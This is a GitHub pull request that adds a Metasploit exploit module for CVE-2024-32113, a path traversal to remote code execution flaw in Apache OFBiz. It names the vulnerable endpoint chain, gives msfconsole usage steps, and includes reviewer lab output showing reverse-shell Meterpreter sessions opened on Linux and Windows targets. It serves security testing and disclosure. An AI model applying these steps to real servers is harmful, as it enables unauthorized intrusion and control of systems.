Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Apache OFBiz Directory Traversal RCE [CVE-2024-32113] #19249

Merged
merged 3 commits into from
Jun 17, 2024
Merged

Apache OFBiz Directory Traversal RCE [CVE-2024-32113] #19249

merged 3 commits into from
Jun 17, 2024

Conversation

jheysel-r7
Copy link
Contributor

Apache OFBiz versions prior to 18.12.13 are vulnerable to a path traversal vulnerability. The vulnerable endpoint /webtools/control/forgotPassword allows an attacker to access the ProgramExport endpoint which in turn allows for remote code execution in the context of the user running the application.

When exploiting on Windows currently module requires a PowerShell payload to be selected. This payload limitation is outlined in more detail in the documentation.

Verification Steps

  1. Start msfconsole
  2. Do: use apache_ofbiz_forgot_password_directory_traversal
  3. Set the RHOST and LHOST options
  4. Run the module
  5. Receive a session in the context of the user running Apache OFBiz.

@jheysel-r7 jheysel-r7 added module docs rn-modules release notes for new or majorly enhanced modules labels Jun 7, 2024
@jheysel-r7
Copy link
Contributor Author

@msjenkins-r7 retest this please

@smcintyre-r7 smcintyre-r7 self-assigned this Jun 7, 2024
@rapid7 rapid7 deleted a comment Jun 7, 2024
@zeroSteiner zeroSteiner mentioned this pull request Jun 13, 2024
Merged
4 tasks
@jheysel-r7 jheysel-r7 force-pushed the apache_ofbiz_forgot_password_directory_traversal branch from 915e190 to e14dd93 Compare June 15, 2024 00:00
smcintyre-r7
smcintyre-r7 approved these changes Jun 17, 2024
View reviewed changes
Copy link
Contributor

@smcintyre-r7 smcintyre-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I tested this out on both a Windows and Linux target. I used multiple payloads for Windows to confirm the issue was had originally was no longer present. At this time, everything looks good to me and appears to be working as intended.

I'll go ahead and get this landed.

Linux Testing Output

metasploit-framework.pr (S:0 J:0) exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Tested remote code execution successfully
[*] Attempting to exploit...
[*] Sending stage (3045380 bytes) to 192.168.159.128
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.128:42422) at 2024-06-17 10:56:18 -0400
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.250.134
OS           : Debian 11.4 (Linux 6.8.11-300.fc40.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > pwd
/usr/src/apache-ofbiz
meterpreter >

Windows Testing Output

metasploit-framework.pr (S:0 J:0) exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > set PAYLOAD cmd/windows/http/x64/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/http/x64/meterpreter/reverse_tcp
metasploit-framework.pr (S:0 J:0) exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > check
[+] 192.168.159.10:8443 - The target is vulnerable. Tested remote code execution successfully
metasploit-framework.pr (S:0 J:0) exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Tested remote code execution successfully
[*] Attempting to exploit...
[*] Sending stage (201798 bytes) to 192.168.159.10
[*] Meterpreter session 4 opened (192.168.159.128:4444 -> 192.168.159.10:59322) at 2024-06-17 11:19:57 -0400

meterpreter > getuid
Server username: MSFLAB\smcintyre
meterpreter > sysinfo
Computer        : DC
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 9
Meterpreter     : x64/windows
meterpreter > pwd
C:\ofbiz
meterpreter > background 
[*] Backgrounding session 4...
metasploit-framework.pr (S:1 J:0) exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > set PAYLOAD cmd/windows/powershell/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/powershell/meterpreter/reverse_tcp
metasploit-framework.pr (S:1 J:0) exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Tested remote code execution successfully
[*] Attempting to exploit...
[*] Sending stage (176198 bytes) to 192.168.159.10
[*] Meterpreter session 5 opened (192.168.159.128:4444 -> 192.168.159.10:59324) at 2024-06-17 11:20:37 -0400

meterpreter > getuid
Server username: MSFLAB\smcintyre
meterpreter >

@smcintyre-r7 smcintyre-r7 merged commit 818d67b into rapid7:master Jun 17, 2024
39 checks passed
@smcintyre-r7
Copy link
Contributor

Release Notes

This adds an exploit for CVE-2024-32113, which is an unauthenticated RCE in Apache OFBiz.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@jvoisin jvoisin jvoisin left review comments

@smcintyre-r7 smcintyre-r7 smcintyre-r7 approved these changes

Assignees

@smcintyre-r7 smcintyre-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
3 participants
@jheysel-r7 @smcintyre-r7 @jvoisin